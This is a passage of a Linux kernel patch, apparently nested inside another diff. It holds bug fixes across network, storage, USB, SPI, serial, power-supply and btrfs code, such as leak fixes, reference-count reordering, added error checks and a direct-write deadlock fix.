+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index b98ded7098a5a..78d12dda08a05 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -519,6 +519,7 @@ struct mcp251xfd_tef_ring {
+ 
+ 	/* u8 obj_num equals tx_ring->obj_num */
+ 	/* u8 obj_size equals sizeof(struct mcp251xfd_hw_tef_obj) */
++	/* u8 obj_num_shift_to_u8 equals tx_ring->obj_num_shift_to_u8 */
+ 
+ 	union mcp251xfd_write_reg_buf irq_enable_buf;
+ 	struct spi_transfer irq_enable_xfer;
+@@ -537,6 +538,7 @@ struct mcp251xfd_tx_ring {
+ 	u8 nr;
+ 	u8 fifo_nr;
+ 	u8 obj_num;
++	u8 obj_num_shift_to_u8;
+ 	u8 obj_size;
+ 
+ 	struct mcp251xfd_tx_obj obj[MCP251XFD_TX_OBJ_NUM_MAX];
+@@ -843,17 +845,8 @@ static inline u8 mcp251xfd_get_tef_tail(const struct mcp251xfd_priv *priv)
+ 	return priv->tef->tail & (priv->tx->obj_num - 1);
+ }
+ 
+-static inline u8 mcp251xfd_get_tef_len(const struct mcp251xfd_priv *priv)
++static inline u8 mcp251xfd_get_tef_linear_len(const struct mcp251xfd_priv *priv, u8 len)
+ {
+-	return priv->tef->head - priv->tef->tail;
+-}
+-
+-static inline u8 mcp251xfd_get_tef_linear_len(const struct mcp251xfd_priv *priv)
+-{
+-	u8 len;
+-
+-	len = mcp251xfd_get_tef_len(priv);
+-
+ 	return min_t(u8, len, priv->tx->obj_num - mcp251xfd_get_tef_tail(priv));
+ }
+ 
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index cd1f240c90f39..257df16768750 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -678,8 +678,10 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 			of_remove_property(child, prop);
+ 
+ 		phydev = of_phy_find_device(child);
+-		if (phydev)
++		if (phydev) {
+ 			phy_device_remove(phydev);
++			phy_device_free(phydev);
++		}
+ 	}
+ 
+ 	err = mdiobus_register(priv->slave_mii_bus);
+diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c
+index e0393dc159fc7..37d83ff5b30be 100644
+--- a/drivers/net/ethernet/freescale/fec_ptp.c
++++ b/drivers/net/ethernet/freescale/fec_ptp.c
+@@ -635,6 +635,9 @@ void fec_ptp_stop(struct platform_device *pdev)
+ 	struct net_device *ndev = platform_get_drvdata(pdev);
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 
++	if (fep->pps_enable)
++		fec_ptp_enable_pps(fep, 0);
++
+ 	cancel_delayed_work_sync(&fep->time_keep);
+ 	if (fep->ptp_clock)
+ 		ptp_clock_unregister(fep->ptp_clock);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index 56d1bd22c7c66..97d1cfec4ec03 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2146,6 +2146,9 @@ static void mlx5e_handle_rx_cqe_mpwrq_shampo(struct mlx5e_rq *rq, struct mlx5_cq
+ 	if (likely(wi->consumed_strides < rq->mpwqe.num_strides))
+ 		return;
+ 
++	if (unlikely(!cstrides))
++		return;
++
+ 	wq  = &rq->mpwqe.wq;
+ 	wqe = mlx5_wq_ll_get_wqe(wq, wqe_id);
+ 	mlx5e_free_rx_mpwqe(rq, wi, true);
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 46e0e1f1c20e0..ee0ea3d0f50ee 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -200,6 +200,7 @@ static int qmimux_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			break;
+ 		default:
+ 			/* not ip - do not know what to do */
++			kfree_skb(skbn);
+ 			goto skip;
+ 		}
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 27446fa847526..6f648b58cbd4d 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -873,9 +873,9 @@ static blk_status_t nvme_map_metadata(struct nvme_dev *dev, struct request *req,
+ 		struct nvme_command *cmnd)
+ {
+ 	struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
++	struct bio_vec bv = rq_integrity_vec(req);
+ 
+-	iod->meta_dma = dma_map_bvec(dev->dev, rq_integrity_vec(req),
+-			rq_dma_dir(req), 0);
++	iod->meta_dma = dma_map_bvec(dev->dev, &bv, rq_dma_dir(req), 0);
+ 	if (dma_mapping_error(dev->dev, iod->meta_dma))
+ 		return BLK_STS_IOERR;
+ 	cmnd->rw.metadata = cpu_to_le64(iod->meta_dma);
+@@ -1016,7 +1016,7 @@ static __always_inline void nvme_pci_unmap_rq(struct request *req)
+ 	        struct nvme_iod *iod = blk_mq_rq_to_pdu(req);
+ 
+ 		dma_unmap_page(dev->dev, iod->meta_dma,
+-			       rq_integrity_vec(req)->bv_len, rq_dma_dir(req));
++			       rq_integrity_vec(req).bv_len, rq_dma_dir(req));
+ 	}
+ 
+ 	if (blk_rq_nr_phys_segments(req))
+diff --git a/drivers/platform/x86/intel/ifs/ifs.h b/drivers/platform/x86/intel/ifs/ifs.h
+index 73c8e91cf144d..1902a1722df1e 100644
+--- a/drivers/platform/x86/intel/ifs/ifs.h
++++ b/drivers/platform/x86/intel/ifs/ifs.h
+@@ -157,9 +157,17 @@ union ifs_chunks_auth_status {
+ union ifs_scan {
+ 	u64	data;
+ 	struct {
+-		u32	start	:8;
+-		u32	stop	:8;
+-		u32	rsvd	:16;
++		union {
++			struct {
++				u8	start;
++				u8	stop;
++				u16	rsvd;
++			} gen0;
++			struct {
++				u16	start;
++				u16	stop;
++			} gen2;
++		};
+ 		u32	delay	:31;
+ 		u32	sigmce	:1;
+ 	};
+@@ -169,9 +177,17 @@ union ifs_scan {
+ union ifs_status {
+ 	u64	data;
+ 	struct {
+-		u32	chunk_num		:8;
+-		u32	chunk_stop_index	:8;
+-		u32	rsvd1			:16;
++		union {
++			struct {
++				u8	chunk_num;
++				u8	chunk_stop_index;
++				u16	rsvd1;
++			} gen0;
++			struct {
++				u16	chunk_num;
++				u16	chunk_stop_index;
++			} gen2;
++		};
+ 		u32	error_code		:8;
+ 		u32	rsvd2			:22;
+ 		u32	control_error		:1;
+diff --git a/drivers/platform/x86/intel/ifs/runtest.c b/drivers/platform/x86/intel/ifs/runtest.c
+index b2ca2bb4501f6..aeb6a3b7a8fd9 100644
+--- a/drivers/platform/x86/intel/ifs/runtest.c
++++ b/drivers/platform/x86/intel/ifs/runtest.c
+@@ -165,25 +165,35 @@ static int doscan(void *data)
+  */
+ static void ifs_test_core(int cpu, struct device *dev)
+ {
++	union ifs_status status = {};
+ 	union ifs_scan activate;
+-	union ifs_status status;
+ 	unsigned long timeout;
+ 	struct ifs_data *ifsd;
++	int to_start, to_stop;
++	int status_chunk;
+ 	u64 msrvals[2];
+ 	int retries;
+ 
+ 	ifsd = ifs_get_data(dev);
+ 
+-	activate.rsvd = 0;
++	activate.gen0.rsvd = 0;
+ 	activate.delay = IFS_THREAD_WAIT;
+ 	activate.sigmce = 0;
+-	activate.start = 0;
+-	activate.stop = ifsd->valid_chunks - 1;
++	to_start = 0;
++	to_stop = ifsd->valid_chunks - 1;
++
++	if (ifsd->generation) {
++		activate.gen2.start = to_start;
++		activate.gen2.stop = to_stop;
++	} else {
++		activate.gen0.start = to_start;
++		activate.gen0.stop = to_stop;
++	}
+ 
+ 	timeout = jiffies + HZ / 2;
+ 	retries = MAX_IFS_RETRIES;
+ 
+-	while (activate.start <= activate.stop) {
++	while (to_start <= to_stop) {
+ 		if (time_after(jiffies, timeout)) {
+ 			status.error_code = IFS_SW_TIMEOUT;
+ 			break;
+@@ -194,13 +204,14 @@ static void ifs_test_core(int cpu, struct device *dev)
+ 
+ 		status.data = msrvals[1];
+ 
+-		trace_ifs_status(cpu, activate, status);
++		trace_ifs_status(cpu, to_start, to_stop, status.data);
+ 
+ 		/* Some cases can be retried, give up for others */
+ 		if (!can_restart(status))
+ 			break;
+ 
+-		if (status.chunk_num == activate.start) {
++		status_chunk = ifsd->generation ? status.gen2.chunk_num : status.gen0.chunk_num;
++		if (status_chunk == to_start) {
+ 			/* Check for forward progress */
+ 			if (--retries == 0) {
+ 				if (status.error_code == IFS_NO_ERROR)
+@@ -209,7 +220,11 @@ static void ifs_test_core(int cpu, struct device *dev)
+ 			}
+ 		} else {
+ 			retries = MAX_IFS_RETRIES;
+-			activate.start = status.chunk_num;
++			if (ifsd->generation)
++				activate.gen2.start = status_chunk;
++			else
++				activate.gen0.start = status_chunk;
++			to_start = status_chunk;
+ 		}
+ 	}
+ 
+diff --git a/drivers/power/supply/axp288_charger.c b/drivers/power/supply/axp288_charger.c
+index 15219ed43ce95..d3a93f1afef82 100644
+--- a/drivers/power/supply/axp288_charger.c
++++ b/drivers/power/supply/axp288_charger.c
+@@ -178,18 +178,18 @@ static inline int axp288_charger_set_cv(struct axp288_chrg_info *info, int cv)
+ 	u8 reg_val;
+ 	int ret;
+ 
+-	if (cv <= CV_4100MV) {
+-		reg_val = CHRG_CCCV_CV_4100MV;
+-		cv = CV_4100MV;
+-	} else if (cv <= CV_4150MV) {
+-		reg_val = CHRG_CCCV_CV_4150MV;
+-		cv = CV_4150MV;
+-	} else if (cv <= CV_4200MV) {
++	if (cv >= CV_4350MV) {
++		reg_val = CHRG_CCCV_CV_4350MV;
++		cv = CV_4350MV;
++	} else if (cv >= CV_4200MV) {
+ 		reg_val = CHRG_CCCV_CV_4200MV;
+ 		cv = CV_4200MV;
++	} else if (cv >= CV_4150MV) {
++		reg_val = CHRG_CCCV_CV_4150MV;
++		cv = CV_4150MV;
+ 	} else {
+-		reg_val = CHRG_CCCV_CV_4350MV;
+-		cv = CV_4350MV;
++		reg_val = CHRG_CCCV_CV_4100MV;
++		cv = CV_4100MV;
+ 	}
+ 
+ 	reg_val = reg_val << CHRG_CCCV_CV_BIT_POS;
+@@ -337,8 +337,8 @@ static int axp288_charger_usb_set_property(struct power_supply *psy,
+ 		}
+ 		break;
+ 	case POWER_SUPPLY_PROP_CONSTANT_CHARGE_VOLTAGE:
+-		scaled_val = min(val->intval, info->max_cv);
+-		scaled_val = DIV_ROUND_CLOSEST(scaled_val, 1000);
++		scaled_val = DIV_ROUND_CLOSEST(val->intval, 1000);
++		scaled_val = min(scaled_val, info->max_cv);
+ 		ret = axp288_charger_set_cv(info, scaled_val);
+ 		if (ret < 0) {
+ 			dev_warn(&info->pdev->dev, "set charge voltage failed\n");
+diff --git a/drivers/s390/char/sclp_sd.c b/drivers/s390/char/sclp_sd.c
+index f9e164be7568f..944e75beb160c 100644
+--- a/drivers/s390/char/sclp_sd.c
++++ b/drivers/s390/char/sclp_sd.c
+@@ -320,8 +320,14 @@ static int sclp_sd_store_data(struct sclp_sd_data *result, u8 di)
+ 			  &esize);
+ 	if (rc) {
+ 		/* Cancel running request if interrupted */
+-		if (rc == -ERESTARTSYS)
+-			sclp_sd_sync(page, SD_EQ_HALT, di, 0, 0, NULL, NULL);
++		if (rc == -ERESTARTSYS) {
++			if (sclp_sd_sync(page, SD_EQ_HALT, di, 0, 0, NULL, NULL)) {
++				pr_warn("Could not stop Store Data request - leaking at least %zu bytes\n",
++					(size_t)dsize * PAGE_SIZE);
++				data = NULL;
++				asce = 0;
++			}
++		}
+ 		vfree(data);
+ 		goto out;
+ 	}
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 7a6b006e70c88..7bd24f71cc385 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3389,6 +3389,17 @@ static int mpi3mr_prepare_sg_scmd(struct mpi3mr_ioc *mrioc,
+ 		    scmd->sc_data_direction);
+ 		priv->meta_sg_valid = 1; /* To unmap meta sg DMA */
+ 	} else {
++		/*
++		 * Some firmware versions byte-swap the REPORT ZONES command
++		 * reply from ATA-ZAC devices by directly accessing in the host
++		 * buffer. This does not respect the default command DMA
++		 * direction and causes IOMMU page faults on some architectures
++		 * with an IOMMU enforcing write mappings (e.g. AMD hosts).
++		 * Avoid such issue by making the REPORT ZONES buffer mapping
++		 * bi-directional.
++		 */
++		if (scmd->cmnd[0] == ZBC_IN && scmd->cmnd[1] == ZI_REPORT_ZONES)
++			scmd->sc_data_direction = DMA_BIDIRECTIONAL;
+ 		sg_scmd = scsi_sglist(scmd);
+ 		sges_left = scsi_dma_map(scmd);
+ 	}
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 421a03dbbeb73..03fcaf7359391 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -2672,6 +2672,22 @@ _base_build_zero_len_sge_ieee(struct MPT3SAS_ADAPTER *ioc, void *paddr)
+ 	_base_add_sg_single_ieee(paddr, sgl_flags, 0, 0, -1);
+ }
+ 
++static inline int _base_scsi_dma_map(struct scsi_cmnd *cmd)
++{
++	/*
++	 * Some firmware versions byte-swap the REPORT ZONES command reply from
++	 * ATA-ZAC devices by directly accessing in the host buffer. This does
++	 * not respect the default command DMA direction and causes IOMMU page
++	 * faults on some architectures with an IOMMU enforcing write mappings
++	 * (e.g. AMD hosts). Avoid such issue by making the report zones buffer
++	 * mapping bi-directional.
++	 */
++	if (cmd->cmnd[0] == ZBC_IN && cmd->cmnd[1] == ZI_REPORT_ZONES)
++		cmd->sc_data_direction = DMA_BIDIRECTIONAL;
++
++	return scsi_dma_map(cmd);
++}
++
+ /**
+  * _base_build_sg_scmd - main sg creation routine
+  *		pcie_device is unused here!
+@@ -2718,7 +2734,7 @@ _base_build_sg_scmd(struct MPT3SAS_ADAPTER *ioc,
+ 	sgl_flags = sgl_flags << MPI2_SGE_FLAGS_SHIFT;
+ 
+ 	sg_scmd = scsi_sglist(scmd);
+-	sges_left = scsi_dma_map(scmd);
++	sges_left = _base_scsi_dma_map(scmd);
+ 	if (sges_left < 0)
+ 		return -ENOMEM;
+ 
+@@ -2862,7 +2878,7 @@ _base_build_sg_scmd_ieee(struct MPT3SAS_ADAPTER *ioc,
+ 	}
+ 
+ 	sg_scmd = scsi_sglist(scmd);
+-	sges_left = scsi_dma_map(scmd);
++	sges_left = _base_scsi_dma_map(scmd);
+ 	if (sges_left < 0)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/spi/spi-fsl-lpspi.c b/drivers/spi/spi-fsl-lpspi.c
+index 9e324d72596af..dd2381ac27f67 100644
+--- a/drivers/spi/spi-fsl-lpspi.c
++++ b/drivers/spi/spi-fsl-lpspi.c
+@@ -297,7 +297,7 @@ static void fsl_lpspi_set_watermark(struct fsl_lpspi_data *fsl_lpspi)
+ static int fsl_lpspi_set_bitrate(struct fsl_lpspi_data *fsl_lpspi)
+ {
+ 	struct lpspi_config config = fsl_lpspi->config;
+-	unsigned int perclk_rate, scldiv;
++	unsigned int perclk_rate, scldiv, div;
+ 	u8 prescale;
+ 
+ 	perclk_rate = clk_get_rate(fsl_lpspi->clk_per);
+@@ -308,8 +308,10 @@ static int fsl_lpspi_set_bitrate(struct fsl_lpspi_data *fsl_lpspi)
+ 		return -EINVAL;
+ 	}
+ 
++	div = DIV_ROUND_UP(perclk_rate, config.speed_hz);
++
+ 	for (prescale = 0; prescale < 8; prescale++) {
+-		scldiv = perclk_rate / config.speed_hz / (1 << prescale) - 2;
++		scldiv = div / (1 << prescale) - 2;
+ 		if (scldiv < 256) {
+ 			fsl_lpspi->config.prescale = prescale;
+ 			break;
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 00612efc2277f..477c3578e7d9e 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -692,6 +692,7 @@ static const struct file_operations spidev_fops = {
+ static struct class *spidev_class;
+ 
+ static const struct spi_device_id spidev_spi_ids[] = {
++	{ .name = "bh2228fv" },
+ 	{ .name = "dh2228fv" },
+ 	{ .name = "ltc2488" },
+ 	{ .name = "sx1301" },
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index fe3f1d655dfe2..58e857fb8deeb 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -846,6 +846,14 @@ static int uart_set_info(struct tty_struct *tty, struct tty_port *port,
+ 	new_flags = (__force upf_t)new_info->flags;
+ 	old_custom_divisor = uport->custom_divisor;
+ 
++	if (!(uport->flags & UPF_FIXED_PORT)) {
++		unsigned int uartclk = new_info->baud_base * 16;
++		/* check needs to be done here before other settings made */
++		if (uartclk == 0) {
++			retval = -EINVAL;
++			goto exit;
++		}
++	}
+ 	if (!capable(CAP_SYS_ADMIN)) {
+ 		retval = -EPERM;
+ 		if (change_irq || change_port ||
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 5922cb5a1de0d..bfed5d36fa2e5 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3909,11 +3909,16 @@ static inline void ufshcd_add_delay_before_dme_cmd(struct ufs_hba *hba)
+ 			min_sleep_time_us =
+ 				MIN_DELAY_BEFORE_DME_CMDS_US - delta;
+ 		else
+-			return; /* no more delay required */
++			min_sleep_time_us = 0; /* no more delay required */
+ 	}
+ 
+-	/* allow sleep for extra 50us if needed */
+-	usleep_range(min_sleep_time_us, min_sleep_time_us + 50);
++	if (min_sleep_time_us > 0) {
++		/* allow sleep for extra 50us if needed */
++		usleep_range(min_sleep_time_us, min_sleep_time_us + 50);
++	}
++
++	/* update the last_dme_cmd_tstamp */
++	hba->last_dme_cmd_tstamp = ktime_get();
+ }
+ 
+ /**
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index ec1dceb087293..0be0966973c7f 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -592,16 +592,25 @@ int u_audio_start_capture(struct g_audio *audio_dev)
+ 	struct usb_ep *ep, *ep_fback;
+ 	struct uac_rtd_params *prm;
+ 	struct uac_params *params = &audio_dev->params;
+-	int req_len, i;
++	int req_len, i, ret;
+ 
+ 	prm = &uac->c_prm;
+ 	dev_dbg(dev, "start capture with rate %d\n", prm->srate);
+ 	ep = audio_dev->out_ep;
+-	config_ep_by_speed(gadget, &audio_dev->func, ep);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed for out_ep failed (%d)\n", ret);
++		return ret;
++	}
++
+ 	req_len = ep->maxpacket;
+ 
+ 	prm->ep_enabled = true;
+-	usb_ep_enable(ep);
++	ret = usb_ep_enable(ep);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for out_ep (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	for (i = 0; i < params->req_number; i++) {
+ 		if (!prm->reqs[i]) {
+@@ -629,9 +638,18 @@ int u_audio_start_capture(struct g_audio *audio_dev)
+ 		return 0;
+ 
+ 	/* Setup feedback endpoint */
+-	config_ep_by_speed(gadget, &audio_dev->func, ep_fback);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep_fback);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed in_ep_fback failed (%d)\n", ret);
++		return ret; // TODO: Clean up out_ep
++	}
++
+ 	prm->fb_ep_enabled = true;
+-	usb_ep_enable(ep_fback);
++	ret = usb_ep_enable(ep_fback);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for in_ep_fback (%d)\n", ret);
++		return ret; // TODO: Clean up out_ep
++	}
+ 	req_len = ep_fback->maxpacket;
+ 
+ 	req_fback = usb_ep_alloc_request(ep_fback, GFP_ATOMIC);
+@@ -687,13 +705,17 @@ int u_audio_start_playback(struct g_audio *audio_dev)
+ 	struct uac_params *params = &audio_dev->params;
+ 	unsigned int factor;
+ 	const struct usb_endpoint_descriptor *ep_desc;
+-	int req_len, i;
++	int req_len, i, ret;
+ 	unsigned int p_pktsize;
+ 
+ 	prm = &uac->p_prm;
+ 	dev_dbg(dev, "start playback with rate %d\n", prm->srate);
+ 	ep = audio_dev->in_ep;
+-	config_ep_by_speed(gadget, &audio_dev->func, ep);
++	ret = config_ep_by_speed(gadget, &audio_dev->func, ep);
++	if (ret < 0) {
++		dev_err(dev, "config_ep_by_speed for in_ep failed (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	ep_desc = ep->desc;
+ 	/*
+@@ -720,7 +742,11 @@ int u_audio_start_playback(struct g_audio *audio_dev)
+ 	uac->p_residue_mil = 0;
+ 
+ 	prm->ep_enabled = true;
+-	usb_ep_enable(ep);
++	ret = usb_ep_enable(ep);
++	if (ret < 0) {
++		dev_err(dev, "usb_ep_enable failed for in_ep (%d)\n", ret);
++		return ret;
++	}
+ 
+ 	for (i = 0; i < params->req_number; i++) {
+ 		if (!prm->reqs[i]) {
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 3c51355ccc94d..1f143c6ba86bd 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -1436,6 +1436,7 @@ void gserial_suspend(struct gserial *gser)
+ 	spin_lock(&port->port_lock);
+ 	spin_unlock(&serial_port_lock);
+ 	port->suspended = true;
++	port->start_delayed = true;
+ 	spin_unlock_irqrestore(&port->port_lock, flags);
+ }
+ EXPORT_SYMBOL_GPL(gserial_suspend);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 82a10774a7ebc..9dc31a416ec2e 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -118,12 +118,10 @@ int usb_ep_enable(struct usb_ep *ep)
+ 		goto out;
+ 
+ 	/* UDC drivers can't handle endpoints with maxpacket size 0 */
+-	if (usb_endpoint_maxp(ep->desc) == 0) {
+-		/*
+-		 * We should log an error message here, but we can't call
+-		 * dev_err() because there's no way to find the gadget
+-		 * given only ep.
+-		 */
++	if (!ep->desc || usb_endpoint_maxp(ep->desc) == 0) {
++		WARN_ONCE(1, "%s: ep%d (%s) has %s\n", __func__, ep->address, ep->name,
++			  (!ep->desc) ? "NULL descriptor" : "maxpacket 0");
++
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/drivers/usb/serial/usb_debug.c b/drivers/usb/serial/usb_debug.c
+index aaf4813e4971e..406cb326e8124 100644
+--- a/drivers/usb/serial/usb_debug.c
++++ b/drivers/usb/serial/usb_debug.c
+@@ -69,6 +69,11 @@ static void usb_debug_process_read_urb(struct urb *urb)
+ 	usb_serial_generic_process_read_urb(urb);
+ }
+ 
++static void usb_debug_init_termios(struct tty_struct *tty)
++{
++	tty->termios.c_lflag &= ~(ECHO | ECHONL);
++}
++
+ static struct usb_serial_driver debug_device = {
+ 	.driver = {
+ 		.owner =	THIS_MODULE,
+@@ -78,6 +83,7 @@ static struct usb_serial_driver debug_device = {
+ 	.num_ports =		1,
+ 	.bulk_out_size =	USB_DEBUG_MAX_PACKET_SIZE,
+ 	.break_ctl =		usb_debug_break_ctl,
++	.init_termios =		usb_debug_init_termios,
+ 	.process_read_urb =	usb_debug_process_read_urb,
+ };
+ 
+@@ -89,6 +95,7 @@ static struct usb_serial_driver dbc_device = {
+ 	.id_table =		dbc_id_table,
+ 	.num_ports =		1,
+ 	.break_ctl =		usb_debug_break_ctl,
++	.init_termios =		usb_debug_init_termios,
+ 	.process_read_urb =	usb_debug_process_read_urb,
+ };
+ 
+diff --git a/drivers/usb/usbip/vhci_hcd.c b/drivers/usb/usbip/vhci_hcd.c
+index 233265550fc63..6b98f5ab6dfed 100644
+--- a/drivers/usb/usbip/vhci_hcd.c
++++ b/drivers/usb/usbip/vhci_hcd.c
+@@ -745,6 +745,7 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 	 *
+ 	 */
+ 	if (usb_pipedevice(urb->pipe) == 0) {
++		struct usb_device *old;
+ 		__u8 type = usb_pipetype(urb->pipe);
+ 		struct usb_ctrlrequest *ctrlreq =
+ 			(struct usb_ctrlrequest *) urb->setup_packet;
+@@ -755,14 +756,15 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 			goto no_need_xmit;
+ 		}
+ 
++		old = vdev->udev;
+ 		switch (ctrlreq->bRequest) {
+ 		case USB_REQ_SET_ADDRESS:
+ 			/* set_address may come when a device is reset */
+ 			dev_info(dev, "SetAddress Request (%d) to port %d\n",
+ 				 ctrlreq->wValue, vdev->rhport);
+ 
+-			usb_put_dev(vdev->udev);
+ 			vdev->udev = usb_get_dev(urb->dev);
++			usb_put_dev(old);
+ 
+ 			spin_lock(&vdev->ud.lock);
+ 			vdev->ud.status = VDEV_ST_USED;
+@@ -781,8 +783,8 @@ static int vhci_urb_enqueue(struct usb_hcd *hcd, struct urb *urb, gfp_t mem_flag
+ 				usbip_dbg_vhci_hc(
+ 					"Not yet?:Get_Descriptor to device 0 (get max pipe size)\n");
+ 
+-			usb_put_dev(vdev->udev);
+ 			vdev->udev = usb_get_dev(urb->dev);
++			usb_put_dev(old);
+ 			goto out;
+ 
+ 		default:
+@@ -1067,6 +1069,7 @@ static void vhci_shutdown_connection(struct usbip_device *ud)
+ static void vhci_device_reset(struct usbip_device *ud)
+ {
+ 	struct vhci_device *vdev = container_of(ud, struct vhci_device, ud);
++	struct usb_device *old = vdev->udev;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&ud->lock, flags);
+@@ -1074,8 +1077,8 @@ static void vhci_device_reset(struct usbip_device *ud)
+ 	vdev->speed  = 0;
+ 	vdev->devid  = 0;
+ 
+-	usb_put_dev(vdev->udev);
+ 	vdev->udev = NULL;
++	usb_put_dev(old);
+ 
+ 	if (ud->tcp_socket) {
+ 		sockfd_put(ud->tcp_socket);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index c8374527a27d9..55f88eeb78a72 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1294,13 +1294,7 @@ static vm_fault_t vhost_vdpa_fault(struct vm_fault *vmf)
+ 
+ 	notify = ops->get_vq_notification(vdpa, index);
+ 
+-	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
+-	if (remap_pfn_range(vma, vmf->address & PAGE_MASK,
+-			    PFN_DOWN(notify.addr), PAGE_SIZE,
+-			    vma->vm_page_prot))
+-		return VM_FAULT_SIGBUS;
+-
+-	return VM_FAULT_NOPAGE;
++	return vmf_insert_pfn(vma, vmf->address & PAGE_MASK, PFN_DOWN(notify.addr));
+ }
+ 
+ static const struct vm_operations_struct vhost_vdpa_vm_ops = {
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index cca1acf2e0371..853b1f96b1fdc 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1553,6 +1553,7 @@ struct btrfs_drop_extents_args {
+ struct btrfs_file_private {
+ 	void *filldir_buf;
+ 	u64 last_index;
++	bool fsync_skip_inode_lock;
+ };
+ 
+ 
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 1783a0fbf1665..e23d178f97782 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1526,21 +1526,37 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	 * So here we disable page faults in the iov_iter and then retry if we
+ 	 * got -EFAULT, faulting in the pages before the retry.
+ 	 */
++again:
+ 	from->nofault = true;
+ 	dio = btrfs_dio_write(iocb, from, written);
+ 	from->nofault = false;
+ 
+-	/*
+-	 * iomap_dio_complete() will call btrfs_sync_file() if we have a dsync
+-	 * iocb, and that needs to lock the inode. So unlock it before calling
+-	 * iomap_dio_complete() to avoid a deadlock.
+-	 */
+-	btrfs_inode_unlock(inode, ilock_flags);
+-
+-	if (IS_ERR_OR_NULL(dio))
++	if (IS_ERR_OR_NULL(dio)) {
+ 		err = PTR_ERR_OR_ZERO(dio);
+-	else
++	} else {
++		struct btrfs_file_private stack_private = { 0 };
++		struct btrfs_file_private *private;
++		const bool have_private = (file->private_data != NULL);
++
++		if (!have_private)
++			file->private_data = &stack_private;
++
++		/*
++		 * If we have a synchoronous write, we must make sure the fsync
++		 * triggered by the iomap_dio_complete() call below doesn't
++		 * deadlock on the inode lock - we are already holding it and we
++		 * can't call it after unlocking because we may need to complete
++		 * partial writes due to the input buffer (or parts of it) not
++		 * being already faulted in.
++		 */
++		private = file->private_data;
++		private->fsync_skip_inode_lock = true;
+ 		err = iomap_dio_complete(dio);
++		private->fsync_skip_inode_lock = false;
++
++		if (!have_private)
++			file->private_data = NULL;
++	}
+ 
+ 	/* No increment (+=) because iomap returns a cumulative value. */
+ 	if (err > 0)
+@@ -1567,10 +1583,12 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
